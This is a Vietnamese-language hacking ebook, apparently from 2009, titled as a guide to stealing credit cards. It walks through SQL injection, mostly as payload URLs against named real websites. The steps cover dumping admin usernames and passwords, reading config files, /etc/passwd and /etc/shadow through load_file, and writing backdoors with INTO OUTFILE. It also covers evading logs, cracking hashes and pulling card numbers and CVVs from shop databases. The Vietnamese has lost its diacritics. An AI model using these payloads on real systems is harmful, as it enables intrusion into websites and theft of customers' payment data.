Ebook Hacking Credit Card Version

Ebook Hacking Credit Card
Version 4

-----
Its a special version which the title
will be: Hieupc Returns
Copyright by hieupc
Email: hieupc@gmail.com
Yahoo ID: hieuitpc

Chm ngn: Cuc i la nhng chui ngay vt va, cac ban phai bit vt qua no thi mi co th trng thanh
va thanh cng c. ng nhuc tri, hay nghi n gian o chi la th thach cua cuc i.

Xut ban: 09-09-2009

Tac gia Ebook: Hieupc
Page 1
Ebook Hacking Credit Card Version 4 - Hieupc
Li Noi u:
hi gian tri nhanh tht nhi, mi o ma a 4 nm tri, cuc sng cua hieupc thay i qua
nhiu trong khoang thi gian nay. T mt thng chng bit gi v vi tnh, bng choc ti bit
qua nhiu iu v vi tinh, ti a hoc hoi c rt nhiu t cach n noi, i x va thai
gi y co th tam goi la an tm ti co th sng tt xa hi nay. Luc nho ti m c co mt cai
my vi tnh, ba me ti a mua cho ti nh mt mon qua bt ng, ban u ln mang oc sach bao
thy co nhiu iu mi la lm kia va dn dn ti cung quen c vai ngi trn mang. Cho n
gi nay ti vn nh ho la ai va nickname cua ho la gi. Nu ban hoi ti tai sao ti lai c nh
ngy hm nay, thc s cu tra li cung n gian la s c gng khng ngng tim toi hoc hoi,
nhng ti tht may mn khi gp c nhng bc trng lao v mang may tinh luc by gi vi vy
ma ti mi co mt tm hiu bit kha la rng nh by gi. Ti thich vit sach bi vi ti thich chia
se kin thc cua minh cho moi ngi, hy vong rng cac ban se tip thu c phn nao t cun
Ebook ny. Vi vy, hay lun hoc hoi, c cng, chia se c nhn lai va quan trong la ng
nan chi.

P/S: Nu ban oc cam thy cun Ebook nay b ich i vi moi ngi thi hay giup Hieupc chia se
n nh. Moi y kin ong gop va ph binh vui long email vao ia chi: hieupc@gmail.com.

My Friends: Ly0kha, PxNam, J 0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa,
Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi

Ch : Trong nhng bai vit di y co mt s ch c t m mau en va ch mau o l
nhng ch cn phai chu y.

Page 2
T
Ebook Hacking Credit Card Version 4 Hieupc
Muc Luc: Page
I. Exploiting PHP Injection: 4
1. PHP Injection l g? 4
2. Khai thac PHP Injection trit . 4 - 16
II. Getting Root Server by Many Methods: 17
1. Ky thut Exploit Get Root into MYSQL Server. 17 - 24
2. Ky thut chim quyn Admin qua SA MSSQL Server. 25 - 37
3. Nhng iu cn bit v Localhack. 38 - 48
III. How To Get These Important Information: 49
1. Kim link Admin nh th nao. 49 - 50
2. Ly nhng thng tin quan trong ma ta cn. 51 - 53
IV. Exploiting By Tool, Scripts: 54
1. Shell Scripts. 54
2. Tools Hack. 54
V. Speacial Things: 55
1. Hng dn cch Fix SQL Injection va nhng cach khc phc khc. 55 - 64
2. Ngn chn Localhack. 65 - 68
3. Thc tp SQL Injection. 69

Page 3
I. Exploiting PHP Injection:
1. PHP Injection l g:
PHP Injection xt v khia canh server script la thut ng miu ta im yu m mt attacker co
th thc thi c code php khi khng kim soat gi tri truyn vao. Vi d trng hp d liu a
vo c th s dng trong ham eval() hay include()

Vi d:

$myvar ='somevalue';
$x =$_GET['arg'];
eval('$myvar =' . $x . ';');

<?php
$color ='blue';
if (__isset( $_GET['COLOR'] ) )
$color =$_GET['COLOR'];
require( $color . '.php' );
?>
2. Khai thac PHP Injection trit :

SQL Injection la phng thc khai thc da vo qu trnh trao i d liu gia ngi dng v
Web Application. Vic ng dng khng kim tra cc gi tri u vao n n attacker c th cho
thc thi cc SQL query khng mong mun can thip vao database lam thay i, thm, xem hay
xa cc d liu.
Hacker thng khai thc bng cc gi cc gi tri u vao server sinh cc thng tin li t o
ty bin theo cu truy vn gc cua ngi thit k.
Nu Web Application c customize cc trang li hay cc trang li khng tra v, phai lm th
no? Hy th khai thc vi phng thc: blind sql injection.

V d:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
Kt qua tra v l thng tin t database.
Nhng nu ta thm du: thi sao nhi.

Kt qua tra v la 1 trang trng.

Page 4
Ty bin 1:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1
=>Trang web tra v thng tin t database tng t nh trn

Ty bin 2:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2
=>Khng san phm no xut hin.

Vy ta nhn thy y 2 kt qua tra v cua trang web khc nhau. Vi ty bin 1 ta thm iu
kin 1=1 (true) se khng lm anh hng n kt qua cua cu truy vn gc nn vn hin ung
thng tin t database, nhng vi iu kin ty bin 2: 1=2 (false) thm vo, cu truy vn gc se
bi tra kt qua v false dn n khng xut hin thng tin trn trang web. Da vao im ny ta c
th dng cc truy vn ni vo sao cho kt qua nhn la true/false ly thng tin v h thng!
Gia s chng ta khng bit trng v bang cua ng dng web ny l g?
Vi li SQL Injection gy ra bi url trn ta xem th truy vn (SQL) cua n liu c bao nhiu
trng. S d cn xac inh iu ny bi v khi chng ta dng UNION trong cu lnh SQL th s
lng trng cua hai cu lnh select phai trng nhau.
Ta se dung lnh Order by vi thng qua lnh nay no se lam n gian vic m s va nhanh
chong hn.
Xac inh co bao nhiu trng truy vn vi url:
C rt nhiu cach thc hin. y mnh s dng order by <num>. Thc hin tng dn
<num>. Khi thc hin order by <num>, nu trang web khng hin thi li tc l s lng trng
vn cn, thc hin tng <num> cho n khi no xut hin li tc la ta thc hin tm u s
lng trng.
Vi d:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 1 ->vn con binh thng
Kt qua:

Page 5
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 2 ->vn con binh thng.
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 10 ->kt qua la trang trng, khng c ri.
Vy la ta bit kt qua bi li se chi nm trong khoang t 10 tr xung vi vy ta th:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 7 ->vn con binh thng
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 8 ->kt qua la trang trng, vy co ngha la
sao, t nhin s 7 thi thy con binh thng nhng khi ti s 8 thi kt qua la trang trng.

Suy ra: s 7 la s m chng ta ang tim y.
Nh vy truy vn SQL vi Website trn la 7 trng (field)
n y co th iu tra phin ban SQL, User vi lnh sau:
Vi d:
Chu y co du : - nh
Nu khi ta check SQL version ma la: 4.5 hoc di 5.0 thi coi nh ta phai m table v column.
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,3,4,5,6,7--
Kt qua hin ra : mt li t y ta co th khai thac tip: (nh di hinh, li hin ra s 3 va s 4)

Kim tra SQL Version xem sao:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,version(),4,5,6,7--

Page 6
Kt qua hin ra: (tht may mn khi SQL version trn 5.0, vi version nay ta co th query all table_name hay
column_name cung mt luc.)

V c th ta co th kim tra c nhiu information quan trong khac, da vao nhng cu lnh nay: version() , user()
, database() , @@datadir , group_concat(schema_name) , table_schema ,
..+from+information_schema.schemata--
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,user(),4,5,6,7--
Kt qua hin ra:

Ta cung co th lam cach nay gp nhng thng tin cn thit: concat_ws(0x3a,version(),user(),database())
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-
1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--
Nao gi chung ta tip tc khai thac ly tables va columns:
1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables--
Kt qua: trang trng, vy co ngha la sao, i luc ta cung hay gp tinh trang nay, cach giai quyt la th nao y.
Page 7
Ta anh thm: unhex(hex( vao trc group_concat nh. Th kt qua th nao:
1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.t
ables--
Kt qua:

Trong PHP injection hay con goi la Blind Injection ta phai Hex table lai khai thac ly columns t nhng table
quan trong nh: admin, users, accounts.Tai sao phai Hex v Magic_Quotes ang ch : ON
Sau khi, khai thac ly c ht tt ca tables, Hieupc nhn thy site nay co mt table quan trong la: admin. Th khai
thc xem sao: (table: admin c Hieupc Hex thanh: 61646d696e)
1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schem
a.columns where table_name=0x61646d696e--
nh co "0x phia trc dong hex nh. Tng t ta cung phai unhex(hex( vi i vi site nay thi ta phai vy, mt s
site khac co le khng co unhex(hex( hoc co cung khng sao.
Kt qua:

Nh ta thy: 2 column quan trong nht: username, pass cua table: admin
Bc k tip la query ly kt qua ma ta at c:
1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin

Page 8
Kt qua:

Nh vy ta a co c:
Username: cuongle
Pass: cuongle
..va mt s user admin khac.
Lu y: 0x7c la du | ta dung cai nay d nhin va ly thng tin d dang hn, cai nay ta convert ra Hex y ma. Khi
query ly thng tin t table nh trong bai nay l: admin chng han thi ta khng cn phai Hex lam gi. No tht n
gian phai khng, ging nh nhng cach khai thac ma trong nhng cun Ebook trc cung a co va cp n.
Nao gi ta kim link admin vao xem sao: (thng thi: admin, pcadmin, admin_login, admin.php.)
Sau mt hi mo mm, cui cung thi link admin cua no la:
http://www.hoanvustc.com/manager/ gi ta th ng nhp vi username va pass hi nay query th xem sao.
Kt qua: (n y la thanh cng ri nhe)

Page 9

Mt s kinh nghim cua Hieupc:
Trong vic khai thc blind sql injection mt s hm sau to ra hu ch:
1. SUBSTRING(string,vi tr, s lng): Hm ct chui
vd:
SUBSTRING('dbo', 1, 1) =d
SUBSTRING('dbo', 2, 1) =b
SUBSTRING('dbo', 3, 1) =o
2. Lower(): chuyn k t sang ch thng
3. Upper(): chuyn k t sang ch HOA
4. ASCII(): chuyn k t sang s tng ng m ascii
5. If(k,kq1,kq2)
Ngoi ra ch thm:
- Mt s li thng gp cua Mysql Injection:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in
C:\................ on line 37
Li tra v la mt trang trng..
- Ta co th s dng: Union select all, Union all select
- Ta co th s dng table_schema xac inh c tables cua table_schema o.
http://www.website.com/shop.php?id=1+UNION+SELECT+
1,group_concat(table_name),3,4
+from+information_schema.tables+where+table_schema=hie
upc (nh convert hieupc sang Hex hoc Ascii nh.)
- i khi ta hack khng mo ra c link admin thi ta co th query trc tip
t database ly nhng thng tin nh: CC, Information, user, pass.
(vn kim link admin se c trinh bay bai vit tip theo).
- Theo kinh nghim cho thy nu website config ky se chn nhng ham
nh: union, select, convert.luc nay ta c gng th bng cach thay vao o
la ch IN HOA va vit thng chen ln nhau. Vi d: UnIoN SelECt..
- Mt iu thu vi la khi ban a vao c admin panel ri nhng thng tin
quan trong nh: credit card number, hay password cua customer lai bi ma
hoa hoc bi hide i di dang ****, thi ta co th sa code lai hay con goi
la dich ngc code t hide unhide(cai nay chi ap dng trong trng
hp ban co source code cua website o).
- Mt s website secure cao hn thi luc ta query ly table hoc column
se hin ra trang trng hoc bao li th nay, cai nay chc potay ri:
Page 10
- Nu ban khai thac c user va pass cua admin ma bi ma hoa MD5, c
th decode no y:
http://www.th3-0utl4ws.com/tools/md5/md5_looker.php

http://gdataonline.com/seekhash.php
- Ngoai ra nu ban gp inh dang ma hoa la, ban phai lam sao kim c
key ma hoa cua no t o mi co th dich ngc lai.
- i luc ta kim c link admin va co th login trc tip ma khng cn
user va pass bng cach Bypass Login (cai nay se c trinh bay bai vit
tip theo).
- Ta co th s dng du + thay cho khoang trng space, vi d:
union+all+select.
- Trong bai Hieupc s dng: 0x7c tng trng cho du | ta cung co th s
dng nhng ky t khac nh: du 2 chm. Mun convert t dang text
sang Hex, ta vo trang web sau:
http://www.string-functions.com/string-hex.aspx

(ta se thm 0x sau mi string-hex). Vi d: table: admin sau khi convert th
c: 61646d696e v sau khi thm 0x thi c: 0x61646d696e, ly cai
nay a vao cu lnh khai thac.
- Hoc ta cung co th convert sang Ascii thay v convert sang Hex. Vi d:
table: admin convert th ra: char(97,100,109,105,110)
- Mt cht v bang m ASCII:

B k t ASCII gm 256 k t c phn b nh sau:

+32 k t u l cc k t iu khin khng in c v d nh ki t ENTER ( m
13) , k t ESC ( m 27)

+cc m 32-47,58-64,91-96 v 123-127 l cc k t c bit nh du chm,
chm phy , du ngoc , mc , hoi .....

+cc m 48-57 l 10 ch s

+cc m 65-90 l cc ch ci hoa A->Z

+cc k t 97-122 l cc ch cai thng a->z

+cc m ASSCII l cc k t hoa.
- Trng hp bi ngn chn cc thng bo li gi t my chu bng cch
thm du @ trc cu lnh truy vn, dang nay rt kho bi phat hin SQL
Injection. Vi d: Page 11
$id =$_GET[id]; @mysql_query("SELECT * FROM user WHERE
id=$id");

Hoc s dng error_reporting(0); u oan PHP code che du li
xac inh li ny khng th thm du cui cu truy vn nh trn do
bi chn hin li. Trong trng hp nay th ta thm mt ng thc
ng sau cu truy vn nh sau:
http://web.com/user.php?id=1 and 1=1

Nu kt qua trang web sau khi thm vo biu thc trn khng bi thay i
ta ni trang web o kha nng bi li rt ln m ta c th khai thac c.
- Ngoai ra mt s trang web ma Hieupc tng hack, co dang du li nh
sau: khi ta thm du vo sau thi khng hin gi hoc hin ra chi mt phn
no o cua trang web, luc nay ta th view source va se thy li SQL
Injection.
- View Source la mt th khng th thiu trong khi hack Web c bit la
SQL Injection va mt s kiu hack khac nh: XSS, RFI, LFI.
- Nu ban gp MYSQL version di 5 thi phai m table v column quan
trong ly c thng tin minh cn nhe, ta cung co th dung nhng tool
scan tables hay columns. Vi d:

- Trong mt vai trng hp ta cung co th s dng 1,1,1,1,1,1. Thay v
1,2,3,4,5,6 trong cu lnh query SQL Injection.
- i khi ta dung lnh order by nhng trang vn hoan toan trng thi co
ngha la ta phai query bng cach anh t s 1 cho n khi nao hin li mi
thi. Vi d site nay:
http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1
Order by 1 : vn la trang trng, vy la ti y ta hiu ri nn phai t anh
s va mo mm thi, vi d:
http://vn.lge.com/index.php?option=products&task=productsdetails&id=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14--

Page 12
Kt qua:

- Nu trong khi hack chung ta thm du sau mt trang co nghi vn bi li,
ma kt qua tra v la mt trang trng hoan toan, thi co th trang web o
dinh li PHP Injection.
- Lnh union y chinh la lnh kt ni cc bang lai vi nhau. Chng ta
c s dng cho n khi bit chnh xc c bao nhiu bang d liu nm
trong database.
- Nu trng hp xut hin li ta c th thm limit 0,1 va tng dn limit
1,1 limit 2,1 ly ht tt ca thng tin cn thit.
- Ta co th s dng concat thay cho group_concat
- Ta co th s dng null bit chinh xac co bao nhiu bang cua website
o, vi d:
http://www.site.com/index.php?page=-1 union +++select null, null / *
http://www.site.com/index.php?page=99999 union +++select null, null / *
- Chng ta se s dng ln lt cac cu truy vn thng dng nh:
+union select null, null
union select null, null, null
union select null, null, null, null

- Xac inh nhanh co bao nhiu trng trong bang:
Order by 100 .D nhin cac ct khng th no qu 100 ct c.Vi cch
thc ny ta c th nhanh chng bit c bao nhiu ct.V c sai th n se
bo li. Vi vy se rt d ta oan c mt Site co khoang bao ct hay
trng trong bang.

Page 13
- Nu ban query ra qua nhiu table ma cha hin ra c table quan trong
cn tim, thi phai lam sao y, luc nay ta s dng n ham nay:
site.com/index.php?id=-1 union select
1,2,substr(group_concat(table_name),100,300),3,4,5.. dnh cho nhng site binh
thng.

site.com/index.php?id=-1 union select 1,2,
unhex(hex(substr(group_concat(table_name),100,300))),3,4,5.. danh cho nhng site
nao kho chiu nh site ma Hieupc a demo trn.

tip tc xem nhng table tip theo thi ta thay ln lt t 100 ln 200
ri 300..
- Hoc ta cung co th dung LIMIT 1 OFFSET 44-- c th xem tip
nhng thng tin cha hin ht, ta thay i t 44 n 45, 46.... l tables
hoc columns se hin ra ht.Vi d:

-
- Tu thuc vao h quan tri CSDL ma co cac cu phap ghi comment khc
nhau, v d:

- Cn i vi sp_password thi theo minh bit thi no co tac dng i
password cua user. Vi d:

Ngoai ra no c dung bn sau du comment trong cu lnh sql dung
inject th trnh ghi log. Bi vi khi thc thi mt cu lnh SQL thuc loai T-
SQL th h quan tri se ghi nhn lai s kin nay. Nu dung sp_password no
se khng ghi nhn (co ghi nhn nhng khng ghi lai cu lnh SQL cua ta
cho d sp_password c sau du comment i vi SQL Server).
- 1 union select current_user,null/*
hoc
1 union select user(),null/*
Cc cu lnh nay c th cung cp thng tin v MySQL user hin tai, dang nh:
Usernam@server
Hoc ban cung co th oan tn user bng Blind SQLi nu nh khng union c. Cac
cu lnh vi d:
1 and user() like root
1 and mid(user(),1,1)
1 and mid(user(),2,1)>m
1 and ascii(substring(user(),1,1))>64
Page 14
union select
1,2,3,4,5,6,7,concat(table_name,07c,table_schema,07c),9,10,11,12,13,14,15,16,17,18,19
FROM information_schema.tables LIMIT 1 OFFSET 44--
Microsoft Access:
MySql : -- , /* */ , /* , #trong bai vit nay cac ban chu y Hieupc a s dng du --
Sql Server : -- , /* */ , null byte %00

Sp_password 'old_pass','new_pass',user'
Nu SQL Version di 5 th sao?
Theo minh ngh thi chi co cach la mo tables va columns ma minh mun tim thi, hin nay cung
co mt s cng c tool, script h tr scan.
Sau y la bai vit cua tac gia: Seamoun HVA se giup ban nm c phn nao ky thut nay.
u tin vi url:
http://site.com/phpevents/event.php?id=1

Thc hin thm du sau id=1. url tr thanh

Ta pht hin rng phpvents co li SQL Injection vi thng bao sau:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in
C:\xampp\htdocs\phpevents\event.php on line 37

Xac inh co bao nhiu trng truy vn vi:
Ln lt ta th:
http://site.com/phpevents/event.php?id=1 order by 1(<-- Vn OK)
...

http://site.com/phpevents/event.php?id=1 order by 15 (<-- Vn OK)
http://site.com/phpevents/event.php?id=1 order by 16 (Xut hin li)
Nh vy truy vn SQL vi url trn la 15 trng (field)
n y co th iu tra phin ban SQL, user vi lnh sau:
http://site.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1
http://site.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1
Sau khi c s lng trng ri thi luc nay se tin hanh oan bang (table) login cua no: co th
th vi cac table thng dng nh: manager, admin, administrator, systemlogin, (Vic oan
table thuc v kinh nghim, kt hp vi vic crawl, spider ni dung web ma minh khai thac,
cung co th da vao source code co sn ma truy ra c tables va columns la gi). Nu nh tn
bang khng ung thi khi thc hin union all select no se thng bao li, ngc lai nu tn ung
th n chay OK. Tin hanh th tim table nh sau:
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)
Page 15
Sau khi oan c tn table la admin. Tip theo la d oan tn trng trong bang admin ma
mnh ly c. C th oan tn trng trong bang admin nh la username,uname,user,
pass, passwd, password, pword, . (Tng t nh trn cung tuy thuc vao kinh nghim kt hp
vi vic crawl, spider ni dung web tim tn trng.). Tin hanh th nh sau:
http://site.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Nh vy trng th nht ta oan c la uname trong bang admin. Thc hin oan trng mt
khu:

http://site.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Nh vy ta oan c trng mt khu la pword. Nh vy ta a co thng tin y u ly user
v pass trong bang admin vi
2 trng uname v pword +tn bang la admin
Thc hin lnh:
http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from
admin
Thc cht vi hai cu lnh trn thi ta tim c user va pass nhng mun thc hin lnh :
http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from
admin
co c tt ca user va pass trong bang admin. Nu trng hp nay xut hin li ta co th
thm limit 0,1 va tng dn limit 1,1 limit 2,1 ly ht tt ca user va pass
S d thc hin cu lnh trn ng thi ly uname va pword khng cn phai thc hin 2 ln
mi co c uname va pword.
0x3a>du :. Concat se thc hin cng chui
n y ta a co thng tin uname va pword.
Nu trng hp ma kt ni n MySQL s dng user root thi vic tim bang va trng d dang
hn vi lnh sau.
iu tra thng tin bang:
http://site.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from
information_schema.tables

iu tra thng tin trng:
http://site.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from
information_schema.columns

Ngoi ra trong mt s trng hp xut hin li khi thc hin khai thac co th s dng ham
convert, hex, khng bi li khi khai thac nh:
http://site.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin

Page 16
II. Getting Root Server by Many Methods:
1. Ky thut Exploit Get Root into MYSQL Server.
Vn nm ch server MySQL cu hinh th nao. Vi vy ta se s dng mt s cu lnh nh
sau, di y la mt vi d v mt site ma Hieupc a get root c vao MYSQL Server:
union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19
Kt qua:

union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19
Kt qua: (SQL Version trn 5 nh, hn thit)

union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19
Kt qua:

union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19

Database cua no nm y: "/var/lib/mysql/ "

Page 17
Gi ta kim tra tinh privileges cua MYSQL USER xem sao (cai nay quyt inh n get root
c hay khng):
union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
Kt qua tra lai u nh hinh di, N ngha la No, con nu no hin Y ngha la Yes:

Gi ta th vi cach nay xem sao vi user cua Mysql l: muu ma ta a query c trn. (muu a c convert
sang Ascii l: CHAR(109, 117, 117) hoc cung co th convert sang Hex va kt qua convert sang Hex la: muu =
0x6d7575
union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109,
117, 117)
Kt qua la ch Y vi user =muu (vy la ta co quyn vi user=muu ny):

Ban cung co th kim tra quyn FILE trong bang trn m khng cn thm mnh where, tuy nhin Hieupc vn
thm n vo v y la cach nhanh va d dang nht - khi chuyn sang Blind:

1 and mid((select file_priv from mysql.user where user=CHAR(109, 117, 117)),1,1)=a

(ng c thm NULL y, vi y khng phai la union select)
Cch trn c th p dng cho ca Mysql version 4.x va 5.x
Nu MySQL la 5.x ta con co th xem quyn FILE ngay trong information_schema
0 union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = file and
grantee like %username%

Vi blind:
1 and mid((select is_grantable from information_schema.user_privileges where privilege_type = file and grantee
like %username%),1,1)=Y

Page 18
Gi get root th no:
Ta se kim tra xem magic_quotes ang la OFF hay ON, nu la OFF thi ta co th dng cch ny
upload backdoor, nu c nh vy thi cac ban gn nh 90% la kim soat c server. ang
tic la server nay: magic_quotes l ON

Nu ban khng th truy cp vo bang mysql.user hoc information_schema.user chng ta cung
c th bc tip theo sau y. Tuy nhin nu ban oan rng ban khng c quyn FILE th cch
khai thc s dng into outfile se khng thc hin c. into outfile la cu lnh dung a mt
ma c ln site thng qua li PHP Injection nh backdoor, shell script
Nu nh vy ta co th get root c na khng?. Thc s c hi vn con. y, Hieupc dng
cu lnh load_file load mt file trn site nu chung ta bit c chinh xac ng dn ti file
o, thng thng ta se chu y ti file config cua site nh: config.php, db.php, configuration.php.
Khi chng ta bit chc rng mysql user hin tai co quyn FILE, chung ta cn phai tim cho c
ng dn chinh xac n th mc/file ma ta mun ghi file.
Trong hu ht cac trng hp MySQL server c chay cung server vi server web hosting vi
th ta co th t th mc ghi file mc inh chuyn ra th mc web bng cac du ../
Vi Mysql ver 4, ta co th tim ng dn datadir bng hin thi li cua cu lnh:
0 UNION SELECT load_file(a),null/*
Trong mysql 5 th c th union select:
0 UNION SELECT @@datadir,null/*
Kt qua (Nh vy thi chc la Windows ri):

Vy la th mc Data nm y: C:\Program Files\MySQL\MySQL Server 5.0\Data\
Th mc mc inh ghi file se la datadirdatabasename
Ban co th bit c tn databasename bng cu lnh:
0 UNION SELECT database(),null/*
Nu may mn, chung ta co th thy cac warning cua cac lnh nh mysql_result(),
mysql_free_result(), mysql_fetch_row() hoc cac lnh tng t. Trong cac warning nay se hin
thi ng dn n th mc web va chung ta d dang xac inh c th mc ghi file ln. Cac
warning ny c dang nh:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/shop/shopping2/list1.html on line 80.

Page 19
hin thi warning nay co th th cu lnh 0 AND 1=0
Cch lm trn c hiu qua i vi hu ht moi website, tuy nhin nu thng bao li cua mysql bi
tt thi ban co th c gng oan th mc cha web bng cach s dng lnh LOAD_FILE()
load va oc cac file cu hinh. Mt s ng dn mc inh n file cu hinh:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Cung cn chu y xem h iu hanh cua webserver la *nix hay win ma oan cho tt
Thng thng th mc gc cha web thng t :
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/

Ban co th google tim thm. Thng thng ban co th ghi files ln tt ca cac th mc ma
Mysql server c quyn ghi ln, min la ban co quyn FILE. Tuy nhin Admin co th gii han cac
th mc co th ghi c t public. Xem thm tai http://dev.mysql.com/doc/refman/5.1/s-
options.html
Nay gi chung ta a tim hiu k cang. Gi ta th load_file config.php xem ci no i vi Site
ma nay gi ta ang c get root y:
C:/Program Files/Web/config.php convert nguyn oan nay sang Ascii nhe, sau khi convert th
c:
char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,1
18,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)
Gi th cai nao (ch : user =muu cung convert sang Ascii lun nhe, muu =CHAR(109, 117,
117) ):
union all select
1,2,3,load_file(char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,
76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)),5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117)
Page 20
Kt qua n tng:

Gi th ly username va password nay kt ni vao databse server xem sao, n y ta dung
MySQL Query Browser connect database, ci ny ln google.com download v nhe:
Kt qua (a connect thanh cng, khng bit shop nay co CC nhiu khng ta):

Nhn hnh trn thi ta thy: tblcart_payment la co kha nng cha thng tin CC.
Cam giac ma get root c MYSQL server rt la a cac ban, hu nh minh co th lam c tt
ca moi chuyn nh Drop, Update, Delete, hay Insert thng tinMay mn thay user va
pass MySQL ging cua WHM (Cpanel Root), hinh minh hoa bn di:

Page 21
Check xem Shop ny c CC khng no (Xem cai ID cung nhiu y ch, shop nay chc ngon a,
co CVV na ch):
Kt qua nh Hieupc d oan:

Kinh nghim:
Ngoi ra, ta co th dung lnh load_file view cai nay: /etc/passwd. Vi d:
union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119,
100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)

Page 22
Kt qua (ch : nh convert ca etc/password v user=muu sang m Ascii nh):

Ta cung co th view ca : /etc/shadow nu ta co quyn root trong tay, nu ly c pass cua
shadow ban a nm c full quyn s dng server ri y, crack pass shadow =john171d,
download trn google.com nh.
Mt iu khac na la co th update nhng thng tin co sn, bng cach dung lnh: Update
Vi d (ng qun convert sang Ascii nhe nh muu.):
update table_name set column_name=new value where column_name=value where user=muu

Trng hp co quyn FILE, upload Backdoor bng cach nh sau:
Khi ban a chc chn co quyn FILE va xac inh c th mc ghi file, ban co th tin hanh
ghi bng cu lnh SQL:
0 UNION SELECT columnname,null FROM tablename INTO OUTFILE ../../web/dir/file.txt
Hoc la ghi bt c d liu gi, khi ta khng bit tn bang va ct:
1 OR 1=1 INTO OUTFILE ../../web/dir/file.txt
Nu mun bo cac ky t splitting trong d liu, ta co th s dng INTO DUMPFILE thay v
INTO OUTFILE
Cung co th kt hp gia load_file() oc cac file trn server
0 AND 1=0 UNION SELECT load_file() INTO OUTFILE
